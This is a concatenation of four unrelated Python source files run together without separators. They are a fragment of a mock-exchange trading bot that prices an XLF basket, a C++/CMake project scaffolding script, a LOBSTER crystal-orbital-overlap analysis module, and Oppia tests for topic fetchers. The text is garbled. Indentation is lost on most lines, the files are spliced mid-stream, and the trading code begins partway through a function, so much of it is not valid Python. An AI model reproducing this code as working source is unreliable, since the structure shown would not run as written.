if len(xlf_market_sell_prices) < 1 or len(xlf_market_buy_prices) < 1:
return
xlf_lowest_sell = xlf_market_sell_prices[0][0]
xlf_lowest_sell_amount = xlf_market_sell_prices[0][1]
xlf_highest_buy = xlf_market_buy_prices[0][0]
xlf_highest_buy_amount = xlf_market_buy_prices[0][1]
if check_recents():
            gs_average_price = int((recent_buy_prices["GS"] + recent_sell_prices["GS"]) / 2)
            ms_average_price = int((recent_buy_prices['MS'] + recent_sell_prices['MS']) / 2)
            bond_average_price = int((recent_buy_prices["BOND"] + recent_sell_prices["BOND"]) / 2)
            wfc_average_price = int((recent_buy_prices["WFC"] + recent_sell_prices["WFC"]) / 2)
xlf_fair_price = gs_average_price * 0.2 + ms_average_price * 0.3 + bond_average_price * 0.3 + wfc_average_price * 0.2
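            # The weights (0.2 GS, 0.3 MS, 0.3 BOND, 0.2 WFC) sum to 1 and
            # presumably mirror the composition of the XLF basket.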
buy_stock(int(xlf_fair_price - 1), 2, 'XLF')
sell_stock(int(xlf_fair_price + 1), int(inventory['XLF'] / 2), "XLF")
#xlf_buy_price = int(recent_buy_prices["GS"] * 0.2 + recent_buy_prices["MS"] * 0.3 + recent_buy_prices["BOND"] * 0.3 + recent_buy_prices["WFC"] * 0.2)
#print(xlf_buy_price)
#xlf_sell_price = int(recent_sell_prices["GS"] * 0.2 + recent_sell_prices["MS"] * 0.3 + recent_sell_prices["BOND"] * 0.3 + recent_sell_prices["WFC"] * 0.2)
#print(xlf_sell_price)
#xlf_buy_amount = int(recent_buy_amounts["GS"] * 0.2 + recent_buy_amounts["MS"] * 0.3 + recent_buy_amounts["BOND"] * 0.3 + recent_buy_amounts["WFC"] * 0.2)
#print(xlf_buy_amount)
#xlf_sell_amount = int(recent_sell_amounts["GS"] * 0.2 + recent_sell_amounts["MS"] * 0.3 + recent_sell_amounts["BOND"] * 0.3 + recent_sell_amounts["WFC"] * 0.2)
#print(xlf_sell_amount)
#buy_stock(xlf_sell_price, xlf_sell_amount, "XLF")
#buy_stock(xlf_lowest_sell, xlf_lowest_sell_amount, 'XLF')
#sell_stock(xlf_sell_price, int(inventory['XLF'] / 2), "XLF")
# sell_stock(max(xlf_buy_price, xlf_highest_buy_amount), int(inventory['XLF'] / 3) -3, "XLF")
#buy_stock(xlf_buy_price, min(100 - inventory["XLF"], 1), "XLF")
#sell_stock(xlf_sell_price, max(int(inventory["XLF"]/3), 3), "XLF")
#buy_stock(xlf_buy_price, 100 - inventory["XLF"], "XLF")
#sell_stock(xlf_sell_price, int(inventory["XLF"]/3), "XLF")
def update_stock_values(message): # GS, MS, WFC, BOND
symbol = message['symbol']
market_sell_prices = message["sell"]
market_buy_prices = message["buy"]
if len(market_sell_prices) < 1 or len(market_buy_prices) < 1:
return
lowest_sell = market_sell_prices[0][0]
lowest_sell_amount = market_sell_prices[0][1]
highest_buy = market_buy_prices[0][0]
    highest_buy_amount = market_buy_prices[0][1]
recent_buy_prices[symbol] = highest_buy
recent_sell_prices[symbol] = lowest_sell
recent_buy_amounts[symbol] = highest_buy_amount
recent_sell_amounts[symbol] = lowest_sell_amount
def parse_fill(message):
amount = message['size']
symbol = message['symbol']
if message['dir'] == 'SELL':
amount *= -1
inventory[symbol] += amount
# ~~~~~============== MISC ==============~~~~~
# returns t/f if symbol is valid
def validate_symbol(symbol):
return symbol in symbols
def check_recents():
return recent_buy_prices['BOND'] != 0 and recent_buy_prices['GS'] != 0 and recent_buy_prices['MS'] != 0 and recent_buy_prices['WFC'] != 0 \
and recent_sell_prices['BOND'] != 0 and recent_sell_prices['GS'] != 0 and recent_sell_prices['MS'] != 0 and recent_sell_prices['WFC'] != 0 \
and recent_buy_amounts['BOND'] != 0 and recent_buy_amounts['GS'] != 0 and recent_buy_amounts['MS'] != 0 and recent_buy_amounts['WFC'] != 0 \
and recent_sell_amounts['BOND'] != 0 and recent_sell_amounts['GS'] != 0 and recent_sell_amounts['MS'] != 0 and recent_sell_amounts['WFC'] != 0
# ~~~~~============== MAIN LOOP ==============~~~~~
def main():
global exchange, order_id
# dictionary mapping 'stocks' to amount of each stock
global inventory
global symbols
global recent_sell_prices, recent_buy_prices, recent_buy_amounts, recent_sell_amounts
recent_sell_prices = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
recent_buy_prices = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
recent_sell_amounts = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
recent_buy_amounts = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
order_id = 0
inventory = {'BOND':0, 'VALBZ':0, 'VALE':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
symbols = set(['BOND', 'VALBZ', 'VALE', 'GS', 'MS', 'WFC', 'XLF'])
exchange = connect()
write_to_exchange(exchange, {"type": "hello", "team": team_name.upper()})
hello_from_exchange = read_from_exchange(exchange)
# A common mistake people make is to call write_to_exchange() > 1
# time for every read_from_exchange() response.
# Since many write messages generate marketdata, this will cause an
# exponential explosion in pending messages. Please, don't do that!
print("The exchange replied:", hello_from_exchange, file=sys.stderr)
while True:
msg = read_from_exchange(exchange)
print("The exchange replied:", msg, file=sys.stderr)
parse_message(msg)
def generate_order_id():
global order_id
order_id = order_id + 1
if __name__ == "__main__":
    main()
#!/usr/bin/env python
import argparse
import pathlib
from collections import defaultdict
DEFAULT_CPP_VERSION = '20'
SRC_CMAKE_NAME = 'CMakeLists-default'
DEST_CMAKE_NAME = 'CMakeLists.txt'
SRC_MAIN_NAME = 'main-default'
DEST_MAIN_NAME = 'main.cpp'
def create_directories(proj):
p = pathlib.Path(__file__).parent
root_dir = p / proj
build_dir = root_dir / 'build'
if not root_dir.exists():
root_dir.mkdir()
if not build_dir.exists():
build_dir.mkdir()
def create_cmake(proj):
current_path = pathlib.Path(__file__).parent
src_cmake = current_path / SRC_CMAKE_NAME
dest_cmake = current_path / proj / DEST_CMAKE_NAME
src_cmake_data = ''
with open(str(src_cmake), 'r') as file:
src_cmake_data = file.read()
    src_cmake_data = src_cmake_data.format_map(defaultdict(
        str,
        project_name=proj,
        cpp_version=DEFAULT_CPP_VERSION,
        CMAKE_PROJECT_NAME='{CMAKE_PROJECT_NAME}',
    ))
dest_cmake.touch()
dest_cmake.write_text(src_cmake_data)
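# A hypothetical CMakeLists-default template this script could consume
# (unknown placeholders fall back to '' via defaultdict(str), and the
# CMAKE_PROJECT_NAME mapping keeps ${CMAKE_PROJECT_NAME} intact):
#   cmake_minimum_required(VERSION 3.16)
#   project({project_name})
#   set(CMAKE_CXX_STANDARD {cpp_version})
#   add_executable(${CMAKE_PROJECT_NAME} main.cpp)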
def create_main(proj):
current_path = pathlib.Path(__file__).parent
src_main = current_path / SRC_MAIN_NAME
dest_main = current_path / proj / DEST_MAIN_NAME
src_main_data = ''
with open(str(src_main), 'r') as file:
src_main_data = file.read()
dest_main.touch()
dest_main.write_text(src_main_data)
parser = argparse.ArgumentParser(description='Create new coding sample directory.')
parser.add_argument('project', help='Directory name')
args = parser.parse_args()
create_directories(args.project)
create_cmake(args.project)
create_main(args.project)
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 22:28:09 2020
@author: lansf
"""
from __future__ import absolute_import, division, print_function
import os
import pkg_resources
import numpy as np
from ase.io import read
from .vasp_dos import VASP_DOS
from .coordination import Coordination
import itertools
from scipy.ndimage import gaussian_filter1d
def write_lobsterin(directory='.', adsorbate_atoms=['C', 'H', 'O', 'N'],
                    basisSet='pbeVaspFit2015',
                    basisfunctions={'C': '2s 2p', 'O': '2s 2p', 'N': '2s 2p',
                                    'H': '1s', 'Pt': '5d 6s'},
                    gaussianSmearingWidth=0.003):
""" Write a lobster input file
Parameters
----------
directory : str
directory to write the lobsterin file. Must also contain a CONTCAR and
DOSCAR file
adsorbate_atoms : list[str or int]
adsorbate atom symbols or indices
basisSet : str
basis used to projected density onto orbitals
basisfunctions : dict
dictionary of atomic symbols and corresponding basis functions
gaussianSmearingWidth : float
float if Gaussian smearing is used. If tetrahedron method is used then
set to None
"""
    CONTCAR = read(os.path.join(directory, 'CONTCAR'))
    if type(adsorbate_atoms[0]) == str:
        all_symbols = CONTCAR.get_chemical_symbols()
        adsorbate_indices = np.arange(len(all_symbols))[np.isin(all_symbols, adsorbate_atoms)]
    else:
        adsorbate_indices = adsorbate_atoms
    CN = Coordination(CONTCAR, exclude=adsorbate_indices, cutoff=1.25)
bonded = CN.get_bonded()
site_indices = []
for i in adsorbate_indices:
site_indices += bonded[i]
site_indices = list(set(site_indices))
atom_pairs = []
for site_index in site_indices:
for adsorbate_index in adsorbate_indices:
atom_pairs.append((site_index, adsorbate_index))
atom_pairs += list(itertools.combinations(adsorbate_indices,2))
atom_pairs = np.array(atom_pairs) + 1
DOSCAR = os.path.join(directory,'DOSCAR')
DOS = VASP_DOS(DOSCAR)
COHPstartEnergy = DOS.emin - DOS.e_fermi
COHPendEnergy = DOS.emax - DOS.e_fermi
COHPSteps = int(DOS.ndos - 1)
file_name = os.path.join(directory,'lobsterin')
file = open(file_name,'w')
file.write('COHPstartEnergy ' + str(COHPstartEnergy))
file.write('\n')
file.write('COHPendEnergy ' + str(COHPendEnergy))
file.write('\n')
file.write('COHPSteps ' + str(COHPSteps))
file.write('\n')
file.write('basisSet ' + str(basisSet))
file.write('\n')
if gaussianSmearingWidth is not None:
file.write('gaussianSmearingWidth ' + str(gaussianSmearingWidth))
file.write('\n')
for key in basisfunctions.keys():
file.write('basisfunctions ' + key + ' ' + basisfunctions[key])
file.write('\n')
for pair in atom_pairs:
file.write('cohpbetween ' + 'atom ' + str(pair[0]) + ' atom ' + str(pair[1]))
file.write('\n')
file.close()
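# Minimal usage sketch (the directory name is illustrative; it must contain
# the CONTCAR and DOSCAR files from a finished VASP run):
# write_lobsterin(directory='Pt111_CO', adsorbate_atoms=['C', 'O'])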
def get_example_data():
""" Get default path to experimental crystal ovelap populaiton data
Returns
-------
data_path : str
path to example lobster data
"""
data_path = pkg_resources.resource_filename(__name__, 'data/lobster')
return data_path
def get_all_lobster_files(directory, file_type='COOPCAR.lobster'):
""" Get all DOSCAR and CONTCAR file paths
Parameters
----------
directory : str
root directory to look for DOSCAR files
file_type : string
file type for which to search and return file path
Returns
-------
lobster_files : list[str]
list of paths to lobster files of type file_type
"""
lobster_directories = [os.path.join(r,subdirectory) for r,d,f in os.walk(directory)
for subdirectory in d
if file_type in os.listdir(os.path.join(r,subdirectory))]
lobster_files = [os.path.join(d,file_type) for d in lobster_directories]
return lobster_files
def get_bonding_states(orbital_indices, dos_energies, pcoop, pcoop_energies,
                       set_antibonding_zero=False, emax=float('inf')):
""" method for obtaining bonding fraction of dos or dos-like array
Parameters
----------
orbital_indices : list[list]
list of orbital indices for each molecular orbital
dos_energies : numpy.ndarray
energies at which dos is calculated
pcoop : numpy.ndarray
projected orbital overlap populations
pcoop_energies : numpy.ndarray
energies at which the pcoop is calculated
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
Returns
-------
dos_bonding : numpy.ndarray
1-D array of the relative bonding for either dos-like array
"""
if set_antibonding_zero == True:
pcoop[pcoop[...] < 0] = 0
pcoop = np.interp(dos_energies, pcoop_energies,pcoop)
pcoop[dos_energies[...] > emax] = 0
dos_bonding = []
for i in range(len(orbital_indices)):
dos_bonding.append(np.trapz(pcoop[orbital_indices[i]],dos_energies[orbital_indices[i]]))
return dos_bonding
class OVERLAP_POPULATION:
"""Class for analyzing overlap population bonding data
Parameters
----------
file_name : str
full lobster file location
Attributes
----------
emax : float
maximum energy level
emin : float
minimum energy level
ndos : int
        number of discretized energy levels
e_fermi : float
highest occupied energy level
is_spin : bool
indicates if projected density is spin resolved
num_interactions : int
number of interactions in COOP
interactions : list[str]
list of the interactions included in the file
"""
def __init__(self, file_name="COOPCAR.lobster"):
#conditional read statements can be added
num_interactions, interactions, is_spin, ndos, e_fermi, e_min, e_max\
= self._read_coopcar(file_name=file_name)
self.num_interactions = num_interactions
self.interactions = interactions
self.is_spin = is_spin
self.ndos = ndos
self.e_fermi = e_fermi
self.e_min = e_min
self.e_max = e_max
def apply_gaussian_filter(self, sigma):
"""Applies Gaussian filter to self._pcoop
Parameters
----------
sigma : float
standard deviation of Gaussian Kernel
Attributes
----------
_pcoop_original : numpy.ndarray
self._pcoop array without filter
Notes
-----
Understand carefully what this does before using it. It applies a
Gaussian filter to the average and integrated PCOOP and the PCOOP
such that the average and integrated PCOOP may become meaningless
"""
        if hasattr(self, '_pcoop'):
            if not hasattr(self, '_pcoop_original'):
                self._pcoop_original = self._pcoop.copy()
            self._pcoop[1:, :] = gaussian_filter1d(self._pcoop_original[1:, :].copy(), sigma)
def get_energies(self):
""" method for obtaining energy levels
Returns
-------
energies : numpy.ndarray
1-D array of energies
"""
energies = self._pcoop[0,:].copy()
return energies
def get_average_pcoop(self, sum_spin=True):
""" obtain average overlap population for all atom pairs
Parameters
----------
sum_spin : bool
indicates whether data of different spins should be summed
Returns
-------
average_pcoop : numpy.ndarray
1-D or 2-D array of average pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop
if is_spin == True:
if sum_spin == False:
average_pcoop = _pcoop[[1, 2 * num_interactions + 3], :]
else:
average_pcoop = _pcoop[1, :] + _pcoop[2 * num_interactions + 3, :]
else:
average_pcoop = _pcoop[1, :]
return average_pcoop
def get_average_int_pcoop(self, sum_spin=True):
"""obtain average integrated overlap population for all atom pairs
Parameters
----------
sum_spin : bool
indicates whether data of different spins should be summed
Returns
-------
average_int_pcoop : numpy.ndarray
1-D or 2-D array of average integrated pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop
if is_spin == True:
if sum_spin == False:
average_int_pcoop = _pcoop[[2, 2 * num_interactions + 4], :]
else:
average_int_pcoop = _pcoop[2, :] + _pcoop[2 * num_interactions + 4, :]
else:
average_int_pcoop = _pcoop[2, :]
return average_int_pcoop
def get_integrated_pcoop(self, interactions=[], sum_pcoop=False, sum_spin=True
, set_antibonding_zero=False):
""" obtain integrated projected crystal orbital overlap populations
Parameters
----------
interactions : list
indices of interactions for which to find the integrated pcoop
sum_pcoop : bool
indicates whether all pcoop should be summed
sum_spin : bool
indicates whether data of different spins should be summed
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
Returns
-------
integrated_pcoop : numpy.ndarray
1-D, 2-D, or 3-D array of integrated pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop.copy()
if len(interactions) == 0:
interactions = list(range(num_interactions))
if is_spin == True:
spin_up = _pcoop[4:2 * num_interactions + 3:2, :][interactions]
spin_down = _pcoop[2 * num_interactions + 6::2, :][interactions]
if set_antibonding_zero == True:
spin_up[spin_up[...] < 0] = 0
spin_down[spin_down[...] < 0] = 0
if sum_spin == True:
integrated_pcoop = spin_up + spin_down
else:
integrated_pcoop = np.array([spin_up, spin_down])
else:
integrated_pcoop = _pcoop[4::2, :][interactions]
if set_antibonding_zero == True:
integrated_pcoop[integrated_pcoop[...] < 0] = 0
if sum_pcoop == True or len(interactions) == 1:
axis = len(integrated_pcoop.shape) - 2
integrated_pcoop = integrated_pcoop.sum(axis=axis)
return integrated_pcoop
def get_pcoop(self, interactions=[], sum_pcoop=False, sum_spin=True
, set_antibonding_zero=False):
""" method for obtaining projected crystal orbital overlap populations
Parameters
----------
interactions : list
indices of interactions for which to find the integrated pcoop
sum_pcoop : bool
indicates whether all pcoop should be summed
sum_spin : bool
indicates whether data of different spins should be summed
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
Returns
-------
pcoop : numpy.ndarray
1-D or 2-D array of pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop.copy()
if len(interactions) == 0:
interactions = list(range(num_interactions))
if is_spin == True:
spin_up = _pcoop[3:2 * num_interactions + 3:2, :][interactions]
spin_down = _pcoop[2 * num_interactions + 5::2, :][interactions]
if set_antibonding_zero == True:
spin_up[spin_up[...] < 0] = 0
spin_down[spin_down[...] < 0] = 0
if sum_spin == True:
pcoop = spin_up + spin_down
else:
pcoop = np.array([spin_up, spin_down])
else:
pcoop = _pcoop[3::2, :][interactions]
if set_antibonding_zero == True:
pcoop[pcoop[...] < 0] = 0
if sum_pcoop == True or len(interactions) == 1:
axis = len(pcoop.shape) - 2
pcoop = pcoop.sum(axis=axis)
return pcoop
def _read_coopcar(self, file_name="COOPCAR.lobster"):
"""Read lobster COOPCAR and extract projected overlap
Parameters
----------
file_name : str
            file location of the COOPCAR.lobster file
Attributes
----------
_pcoop : numpy.ndarray
numpy array that contains the energy of levels and the projected
crystal orbital overlap population densities
Returns
-------
emax : float
maximum energy level
emin : float
minimum energy level
ndos : int
            number of discretized energy levels
e_fermi : float
highest occupied energy level
is_spin : bool
indicates if projected density is spin resolved
num_interactions : int
number of interactions in COOP
interactions : list[str]
list of the interactions included in the file
"""
f = open(file_name)
f.readline() #skip the first line
descriptive_line = f.readline().split()
num_interactions = int(descriptive_line[0]) - 1
is_spin = int(descriptive_line[1])
if is_spin == 2:
is_spin = True
else:
is_spin = False
ndos = int(descriptive_line[2])
e_fermi = float(descriptive_line[5])
e_min = float(descriptive_line[3])
e_max = float(descriptive_line[4])
f.readline() #skip the line saying average
interactions = []
for i in range(num_interactions):
interactions += f.readline().split()
line = f.readline().split()
pcoop = np.zeros((ndos,len(line)))
pcoop[0] = np.array(line)
for nd in range(1,ndos):
line = f.readline().split()
pcoop[nd] = np.array(line)
pcoop = pcoop.T
pcoop[0] += e_fermi
self._pcoop = pcoop
return num_interactions, interactions, is_spin, ndos, e_fermi, e_min, e_max
def get_bonding_states(self, orbital_indices, dos_energies\
, interactions=[], set_antibonding_zero=False
, emax=float('inf')):
""" method for obtaining bonding fraction of dos or dos-like array
Parameters
----------
orbital_indices : list[list]
list of energy indices for each molecular orbital
dos_energies : numpy.ndarray
energies at which dos is calculated
interactions : list
indices of interactions for which to find the integrated pcoop
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
emax : float
maximum energy level
Returns
-------
dos_bonding : numpy.ndarray
1-D array of the relative bonding for either dos-like array
"""
get_pcoop = self.get_pcoop
get_energies = self.get_energies
pcoop = get_pcoop(interactions=interactions, sum_pcoop=True, sum_spin=True
, set_antibonding_zero=set_antibonding_zero)
bonding_states = get_bonding_states(orbital_indices, dos_energies, pcoop
, get_energies()
, set_antibonding_zero=set_antibonding_zero
, emax = emax)
return bonding_states
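# Minimal usage sketch (the file name is illustrative):
# pop = OVERLAP_POPULATION('COOPCAR.lobster')
# energies = pop.get_energies()
# net_pcoop = pop.get_pcoop(sum_pcoop=True)               # net overlap population
# int_pcoop = pop.get_integrated_pcoop(sum_pcoop=True)    # integrated up to each energy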
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for topic domain objects."""
from __future__ import annotations
from core import feconf
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
from typing import List, Optional
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import topic_models
(topic_models,) = models.Registry.import_models([models.Names.TOPIC])
class MockTopicObject(topic_domain.Topic):
"""Mocks Topic domain object."""
@classmethod
def _convert_story_reference_v1_dict_to_v2_dict(
cls, story_reference: topic_domain.StoryReferenceDict
) -> topic_domain.StoryReferenceDict:
"""Converts v1 story reference dict to v2."""
return story_reference
class TopicFetchersUnitTests(test_utils.GenericTestBase):
"""Tests for topic fetchers."""
user_id: str = 'user_id'
story_id_1: str = 'story_1'
story_id_2: str = 'story_2'
story_id_3: str = 'story_3'
subtopic_id: int = 1
skill_id_1: str = 'skill_1'
skill_id_2: str = 'skill_2'
def setUp(self) -> None:
super().setUp()
self.TOPIC_ID = topic_fetchers.get_new_topic_id()
changelist = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_ADD_SUBTOPIC,
'title': 'Title',
'subtopic_id': 1,
'url_fragment': 'sample-fragment'
})]
self.save_new_topic(
self.TOPIC_ID, self.user_id, name='Name',
abbreviated_name='name', url_fragment='name-one',
description='Description',
canonical_story_ids=[self.story_id_1, self.story_id_2],
additional_story_ids=[self.story_id_3],
uncategorized_skill_ids=[self.skill_id_1, self.skill_id_2],
subtopics=[], next_subtopic_id=1)
self.save_new_story(self.story_id_1, self.user_id, self.TOPIC_ID)
self.save_new_story(
self.story_id_3,
self.user_id,
self.TOPIC_ID,
title='Title 3',
description='Description 3')
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup(self.CURRICULUM_ADMIN_EMAIL, self.CURRICULUM_ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_admin = (
self.get_user_id_from_email(self.CURRICULUM_ADMIN_EMAIL))
topic_services.update_topic_and_subtopic_pages(
self.user_id_admin, self.TOPIC_ID, changelist, 'Added a subtopic')
self.topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(self.TOPIC_ID)
)
self.set_curriculum_admins([self.CURRICULUM_ADMIN_USERNAME])
self.set_topic_managers(
[user_services.get_username(self.user_id_a)], self.TOPIC_ID)
self.user_a = user_services.get_user_actions_info(self.user_id_a)
self.user_b = user_services.get_user_actions_info(self.user_id_b)
self.user_admin = user_services.get_user_actions_info(
self.user_id_admin)
def test_get_topic_from_model(self) -> None:
topic_model: Optional[topic_models.TopicModel] = (
topic_models.TopicModel.get(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_model is not None
topic: topic_domain.Topic = (
topic_fetchers.get_topic_from_model(topic_model)
)
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
self.assertEqual(topic.to_dict(), self.topic.to_dict())
def test_get_topic_by_name(self) -> None:
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_name('Name')
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
self.assertEqual(topic.name, 'Name')
def test_raises_error_if_wrong_name_is_used_to_get_topic_by_name(
self
) -> None:
with self.assertRaisesRegex(
Exception,
'No Topic exists for the given topic name: wrong_topic_name'
):
topic_fetchers.get_topic_by_name('wrong_topic_name', strict=True)
def test_get_topic_rights_is_none(self) -> None:
fake_topic_id = topic_fetchers.get_new_topic_id()
fake_topic: Optional[topic_domain.TopicRights] = (
topic_fetchers.get_topic_rights(fake_topic_id, strict=False)
)
self.assertIsNone(fake_topic)
def test_get_topic_by_url_fragment(self) -> None:
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_url_fragment('name-one')
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
self.assertEqual(topic.url_fragment, 'name-one')
def test_get_all_topic_rights(self) -> None:
topic_rights = topic_fetchers.get_all_topic_rights()
topic_id_list = [self.TOPIC_ID]
for topic_key in topic_rights:
self.assertIn(topic_key, topic_id_list)
def test_get_canonical_story_dicts(self) -> None:
self.save_new_story(self.story_id_2, self.user_id, self.TOPIC_ID)
topic_services.publish_story(
self.TOPIC_ID, self.story_id_1, self.user_id_admin)
topic_services.publish_story(
self.TOPIC_ID, self.story_id_2, self.user_id_admin)
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
canonical_dict_list: List[topic_fetchers.CannonicalStoryDict] = (
topic_fetchers.get_canonical_story_dicts(self.user_id_admin, topic)
)
self.assertEqual(len(canonical_dict_list), 2)
story_dict_1: topic_fetchers.CannonicalStoryDict = {
'id': 'story_1',
'title': 'Title',
'description': 'Description',
'node_titles': [],
'thumbnail_bg_color': None,
'thumbnail_filename': None,
'url_fragment': 'title',
'topic_url_fragment': 'name-one',
'classroom_url_fragment': 'staging',
'story_is_published': True,
'completed_node_titles': [], 'all_node_dicts': []}
story_dict_2: topic_fetchers.CannonicalStoryDict = {
'id': 'story_2',
'title': 'Title',
'description': 'Description',
'node_titles': [],
'thumbnail_bg_color': None,
'thumbnail_filename': None,
'url_fragment': 'title',
'topic_url_fragment': 'name-one',
'classroom_url_fragment': 'staging',
'story_is_published': True,
'completed_node_titles': [], 'all_node_dicts': []}
story_dict_list = [story_dict_1, story_dict_2]
for canonical_story_dict in canonical_dict_list:
self.assertIn(canonical_story_dict, story_dict_list)
def test_get_all_topics(self) -> None:
topics = topic_fetchers.get_all_topics()
self.assertEqual(len(topics), 1)
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
self.assertEqual(topics[0].id, self.topic.id)
def test_cannot_get_topic_from_model_with_invalid_schema_version(
self
) -> None:
topic_services.create_new_topic_rights('topic_id', self.user_id_a)
commit_cmd = topic_domain.TopicChange({
'cmd': topic_domain.CMD_CREATE_NEW,
'name': 'name'
})
subtopic_dict = {
'id': 1,
'title': 'subtopic_title',
'skill_ids': []
}
model = topic_models.TopicModel(
id='topic_id',
name='name',
abbreviated_name='abbrev',
url_fragment='name-two',
canonical_name='canonical_name',
description='description',
next_subtopic_id=1,
language_code='en',
subtopics=[subtopic_dict],
subtopic_schema_version=0,
story_reference_schema_version=0,
page_title_fragment_for_web='fragm'
)
commit_cmd_dicts = [commit_cmd.to_dict()]
model.commit(
self.user_id_a, 'topic model created', commit_cmd_dicts)
with self.assertRaisesRegex(
Exception,
'Sorry, we can only process v1-v%d subtopic schemas at '
'present.' % feconf.CURRENT_SUBTOPIC_SCHEMA_VERSION):
topic_fetchers.get_topic_from_model(model)
topic_services.create_new_topic_rights('topic_id_2', self.user_id_a)
model = topic_models.TopicModel(
id='topic_id_2',
name='name 2',
description='description 2',
abbreviated_name='abbrev',
url_fragment='name-three',
canonical_name='canonical_name_2',
next_subtopic_id=1,
language_code='en',
subtopics=[subtopic_dict],
subtopic_schema_version=1,
story_reference_schema_version=0,
page_title_fragment_for_web='fragm'
)
commit_cmd_dicts = [commit_cmd.to_dict()]
model.commit(
self.user_id_a, 'topic model created', commit_cmd_dicts)
with self.assertRaisesRegex(
Exception,
'Sorry, we can only process v1-v%d story reference schemas at '
'present.' % feconf.CURRENT_STORY_REFERENCE_SCHEMA_VERSION):
topic_fetchers.get_topic_from_model(model)
def test_topic_model_migration_to_higher_version(self) -> None:
topic_services.create_new_topic_rights('topic_id', self.user_id_a)
commit_cmd = topic_domain.TopicChange({
'cmd': topic_domain.CMD_CREATE_NEW,
'name': 'name'
})
subtopic_v1_dict = {
'id': 1,
'title': 'subtopic_title',
'skill_ids': []
}
model = topic_models.TopicModel(
id='topic_id',
name='name 2',
description='description 2',
abbreviated_name='abbrev',
url_fragment='name-three',
canonical_name='canonical_name_2',
next_subtopic_id=1,
language_code='en',
subtopics=[subtopic_v1_dict],
subtopic_schema_version=1,
story_reference_schema_version=1,
page_title_fragment_for_web='fragment'
)
commit_cmd_dicts = [commit_cmd.to_dict()]
model.commit(
self.user_id_a, 'topic model created', commit_cmd_dicts)
swap_topic_object = self.swap(topic_domain, 'Topic', MockTopicObject)
        current_story_reference_schema_version_swap = self.swap(
            feconf, 'CURRENT_STORY_REFERENCE_SCHEMA_VERSION', 2)
        with swap_topic_object, current_story_reference_schema_version_swap:
topic: topic_domain.Topic = (
topic_fetchers.get_topic_from_model(model))
self.assertEqual(topic.story_reference_schema_version, 2)
def test_get_topic_by_id(self) -> None:
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
expected_topic = self.topic.to_dict()
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
self.assertEqual(topic.to_dict(), expected_topic)
fake_topic_id = topic_fetchers.get_new_topic_id()
fake_topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(fake_topic_id, strict=False)
)
self.assertIsNone(fake_topic)
def test_get_topic_by_version(self) -> None:
topic_id = topic_fetchers.get_new_topic_id()
self.save_new_topic(
topic_id, self.user_id, name='topic name',
abbreviated_name='topic-name', url_fragment='topic-name',
description='Description', canonical_story_ids=[],
additional_story_ids=[], uncategorized_skill_ids=[],
subtopics=[], next_subtopic_id=1)
changelist = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_UPDATE_TOPIC_PROPERTY,
'property_name': topic_domain.TOPIC_PROPERTY_LANGUAGE_CODE,
'old_value': 'en',
'new_value': 'bn'
})]
topic_services.update_topic_and_subtopic_pages(
self.user_id, topic_id, changelist, 'Change language code')
topic_v0: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(topic_id, version=0)
)
topic_v1: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(topic_id, version=1)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_v0 is not None
assert topic_v1 is not None
self.assertEqual(topic_v1.language_code, 'en')
self.assertEqual(topic_v0.language_code, 'bn')
def test_get_topics_by_id(self) -> None:
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
expected_topic = self.topic.to_dict()
topics: List[Optional[topic_domain.Topic]] = (
topic_fetchers.get_topics_by_ids([self.TOPIC_ID])
)
# Ruling out the possibility of None for mypy type checking.
assert topics[0] is not None
self.assertEqual(topics[0].to_dict(), expected_topic)
